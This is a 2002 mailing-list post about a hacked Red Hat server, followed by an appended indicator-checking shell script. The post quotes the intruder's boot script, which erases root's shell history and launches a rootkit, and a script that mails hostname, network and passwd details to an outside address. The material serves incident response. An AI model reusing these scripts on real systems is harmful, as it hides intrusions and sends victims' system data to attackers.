[lug] i got hacked

j davis davis_compz at hotmail.com
Thu Apr 18 15:44:09 MDT 2002


I have a box at a place where I do contract work about 2 days a month.
Today I could not ssh to it, so I went on site and discovered I got
hacked... like a dummy I didn't have TCP wrappers on or a firewall. I think
they exploited wu-ftpd... I use Red Hat 7.1 with wu-ftpd 2.6.1-20... I haven't
got around to upgrading yet.
Anyway, here is what I found in /etc/rc3.d/S52remote

#!/bin/sh

rm -rf /root/.bash_history
ln -s /dev/null /root/.bash_history

cd /dev
./ryz -f ./s
/etc/rc.d/init.d/sshd stop
cd /

/usr/bin/trimite

Then here is /usr/bin/trimite

#!/bin/sh

echo "* Info : $(uname -a)" >> /tmp/info
echo "* Hostname : $(hostname -f)" >> /tmp/info
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >> /tmp/info
echo "* Uptime : $(uptime)" >> /tmp/info
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)" >> /tmp/info
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >> /tmp/info
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >> /tmp/info
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >> /tmp/info
echo "* Spatiu Liber: $(df -h)" >> /tmp/info
echo "* Ping la Yahoo: $(ping -c3 yahoo.com)" >> /tmp/info
echo "* Password: $(wc /etc/passwd -l)" >> /tmp/info
echo "* Portul rootkitului este 25897" >> /tmp/info
cat /tmp/info | mail -s "root dupa reboot" ryz_ro at yahoo.com
rm -f /tmp/info

So, netstat says I have something listening on 25897... what should I do?!
Never been hacked before... I already turned off ftp and turned on TCP
wrappers.

help please
jd
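An added triage helper, not part of the original post, for anyone finding the same artifacts on a Red Hat box: it looks for exactly the things the two scripts above create or use (the rc script, /usr/bin/trimite, the files under /dev the rc script launches, the /root/.bash_history symlink to /dev/null, and a listener on the port the mailer script announces) and reports how many are present. The ROOT argument is an assumption of this helper so it can be run against a mounted image of the disk as well as the live system; the stage_demo_tree function builds a constructed copy of the artifacts purely so the checks can be exercised without a compromised host.

```sh
#!/bin/sh
# Added triage helper (illustration, not from the original post).
# Looks for the artifacts the post's dropper and mailer scripts leave behind.
# Usage on a live box:   netstat -an > /tmp/ns.txt; sh triage.sh / /tmp/ns.txt
# Usage on a mounted image: sh triage.sh /mnt/evidence /tmp/ns.txt
# Usage for a dry run:   sh triage.sh --demo

# Relative paths named in or created by the scripts in the post.
INDICATOR_FILES="etc/rc3.d/S52remote usr/bin/trimite dev/ryz dev/s"
# Port the mailer script reports ("Portul rootkitului este 25897").
ROOTKIT_PORT=25897

# count_indicators ROOT NETSTAT_FILE
# Findings go to stderr, the number of findings to stdout.
# 0 means none of the post's artifacts were seen, not that the box is clean.
count_indicators() {
    root=${1%/}            # "/" becomes "", so "$root/etc" stays well formed
    netstat_file=$2
    found=0

    for rel in $INDICATOR_FILES; do
        if [ -e "$root/$rel" ]; then
            echo "FOUND file: $root/$rel" >&2
            found=$((found + 1))
        fi
    done

    # The rc script replaces root's history with a symlink to /dev/null so
    # nothing typed as root is recorded; a symlink here is a strong signal.
    hist="$root/root/.bash_history"
    if [ -L "$hist" ] && [ "$(readlink "$hist")" = "/dev/null" ]; then
        echo "FOUND symlink: $hist -> /dev/null" >&2
        found=$((found + 1))
    fi

    # A saved "netstat -an" with a socket on the announced port is a direct
    # match; on the live box, "netstat -anp" also shows the owning process.
    if [ -f "$netstat_file" ] && grep -q ":$ROOTKIT_PORT " "$netstat_file"; then
        echo "FOUND listener: tcp port $ROOTKIT_PORT (in $netstat_file)" >&2
        found=$((found + 1))
    fi

    echo "$found"
}

# list_dev_regular_files ROOT
# Both scripts cd into /dev to run ./ryz; regular files under /dev deserve
# a manual look, though a few are legitimate (Red Hat 7.1 shipped MAKEDEV there).
list_dev_regular_files() {
    find "${1%/}/dev" -type f 2>/dev/null
}

# stage_demo_tree DIR
# Builds a constructed directory tree reproducing the post's artifacts.
# Sample content only; the real binaries are not reproduced.
stage_demo_tree() {
    d=$1
    mkdir -p "$d/etc/rc3.d" "$d/usr/bin" "$d/dev" "$d/root"
    printf '#!/bin/sh\n/usr/bin/trimite\n' > "$d/etc/rc3.d/S52remote"
    printf '#!/bin/sh\necho demo\n' > "$d/usr/bin/trimite"
    : > "$d/dev/ryz"
    : > "$d/dev/s"
    ln -s /dev/null "$d/root/.bash_history"
    # Constructed "netstat -an" style output with the backdoor listener.
    printf 'tcp  0  0 0.0.0.0:22     0.0.0.0:*  LISTEN\n' > "$d/netstat.txt"
    printf 'tcp  0  0 0.0.0.0:%s  0.0.0.0:*  LISTEN\n' "$ROOTKIT_PORT" >> "$d/netstat.txt"
}

case "${1:-}" in
    --demo)
        demo=$(mktemp -d)
        stage_demo_tree "$demo"
        n=$(count_indicators "$demo" "$demo/netstat.txt")
        echo "indicators found in demo tree: $n"
        list_dev_regular_files "$demo"
        rm -rf "$demo"
        ;;
    "")
        ;;   # sourced or run without arguments: define functions only
    *)
        n=$(count_indicators "$1" "${2:-/dev/null}")
        echo "indicators found: $n"
        list_dev_regular_files "$1"
        ;;
esac
```

Run it from a known-good shell (a rescue CD or a statically linked busybox copied over), since an intruder who has replaced ls, find, netstat or readlink can make the live system lie; the mounted-image mode avoids that problem entirely. A count above zero is grounds to treat the machine as fully compromised and rebuild from known-good media after copying off what you need for the post-mortem, rather than just deleting the files found.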